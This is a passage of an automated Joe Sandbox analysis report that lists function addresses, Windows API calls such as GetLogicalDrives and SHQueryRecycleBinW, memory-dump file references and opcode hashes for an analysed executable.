                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __aulldiv
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 3732870572-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 59de480195b1ca1b7c85286dea745b7e675da52321248cfd22c7f778a576f342
                                                                                                                                                                                                                                                                                    • Instruction ID: d8bfd7cdfac141d9cfdb0ffece5a98f1ca78eb3dd6e2b02cd9253dc2d6ef05f2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59de480195b1ca1b7c85286dea745b7e675da52321248cfd22c7f778a576f342
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6ED137756083409FC314DF69C98092BFBE4BFC8314F05896EF99997311E739E8058BA6
                                                                                                                                                                                                                                                                                    Function 0045D2A0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045D3BE
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045D3D1
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 885266447-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: fffd3d7282f3ca9193e1cd667b51c6e9b1393ee17bf43d276ed476b0d10faf7b
                                                                                                                                                                                                                                                                                    • Instruction ID: 5dffe6ef64173943b566a41739161ce8ce63ae2a9ff69b85a90aeb8992a9e3ab
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fffd3d7282f3ca9193e1cd667b51c6e9b1393ee17bf43d276ed476b0d10faf7b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24A17A71A043099FC324EF68C98096AB7F5FF89305F14892EE89687312D774F949CB5A
                                                                                                                                                                                                                                                                                    Function 0045D020 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 202COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __aulldiv
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 3732870572-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 3015ac86ba649a29268a85483f7edd6aab0f416968bd909a9fe1b0c52b9cb0c5
                                                                                                                                                                                                                                                                                    • Instruction ID: 84b8ef7fa6ef3b0704b7dcc146b1b846a3d4774a27478fb056f40241b994564c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3015ac86ba649a29268a85483f7edd6aab0f416968bd909a9fe1b0c52b9cb0c5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46719C71A046049FC724EF64C884A6BB7E4FF88311F14896EFC4687352D775E849CBAA
                                                                                                                                                                                                                                                                                    Function 0042B060 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 192COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,113262B6,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • SHQueryRecycleBinW.SHELL32(?,?), ref: 0042B1A8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalEnterQueryRecycleSection
                                                                                                                                                                                                                                                                                    • String ID: C:\$`=
                                                                                                                                                                                                                                                                                    • API String ID: 1132591718-3292444104
                                                                                                                                                                                                                                                                                    • Opcode ID: 85201a436fdb5bbfeaee31a0dc8f4d63786e17b77ffd3cec1582f3d352d27140
                                                                                                                                                                                                                                                                                    • Instruction ID: acc36582b151d86fb2590580dfdaf1570fbc9ca1bde0f0bfc179c8702fc33688
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85201a436fdb5bbfeaee31a0dc8f4d63786e17b77ffd3cec1582f3d352d27140
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F716D71604351CFC720EF64D981BAFB7E4FF88354F41892EE89997250D734A944CBAA
                                                                                                                                                                                                                                                                                    Function 00456250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 00456370
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?), ref: 004563C5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                    • String ID: P
                                                                                                                                                                                                                                                                                    • API String ID: 2050909247-3110715001
                                                                                                                                                                                                                                                                                    • Opcode ID: 225ffd7624e7e299ef96e9004fd2a35e3cd367921e50112ae392b81e183853ea
                                                                                                                                                                                                                                                                                    • Instruction ID: d9fc715740b337443135b9810308ba2b6a4282878f9a2242fee2fe4f623e65b9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 225ffd7624e7e299ef96e9004fd2a35e3cd367921e50112ae392b81e183853ea
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6951A0716006119BC710DF68D88466AB7A4FF89715F514B2FED2487392CB78EC48CBDA
                                                                                                                                                                                                                                                                                    Function 00427220 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,113262B6,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoInitialize.OLE32(00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 00427273
                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 004272D7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateCriticalDriveDrivesEnterInitializeInstanceLogicalSectionTypeUninitialize
                                                                                                                                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                                                                                                                                    • API String ID: 2354564324-3404278061
                                                                                                                                                                                                                                                                                    • Opcode ID: f60440959189295cd425f4ed1094c27380a597b75a56eb5106b80638b3ca90fc
                                                                                                                                                                                                                                                                                    • Instruction ID: c90efa92af71126dba6429048660511b38e7c0dbb77debf846213f4ca3b284e1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f60440959189295cd425f4ed1094c27380a597b75a56eb5106b80638b3ca90fc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A518971A187519FC314DF29D881A5BBBE4FF88714F804A2EF899C7390D734A904CB8A
                                                                                                                                                                                                                                                                                    Function 00504870 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Catch
                                                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                    • API String ID: 78271584-2084237596
                                                                                                                                                                                                                                                                                    • Opcode ID: 60d334a2babda9015152320fb1b56685fe8a5b2565357ad46f9000524526b17b
                                                                                                                                                                                                                                                                                    • Instruction ID: 7f3e499a65fa1b5ee95370a69dc2f62e8b798b9dea4c67a4a9596effe2b86ecb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60d334a2babda9015152320fb1b56685fe8a5b2565357ad46f9000524526b17b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 754159B1900209AFCF15DF98CD85AEEBFB5BF48304F1485A9FA04A6291D335AD60DF50
                                                                                                                                                                                                                                                                                    Function 00507C97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: ~P
                                                                                                                                                                                                                                                                                    • API String ID: 0-500931198
                                                                                                                                                                                                                                                                                    • Opcode ID: af959c50f9ceb22731f565f3fb959b59621721a55135329773564823bcb7b730
                                                                                                                                                                                                                                                                                    • Instruction ID: 3f53a812ee88c614be39cb66f25ae1a6b01f6845a1ee28e41b72ee3cff38c9b7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af959c50f9ceb22731f565f3fb959b59621721a55135329773564823bcb7b730
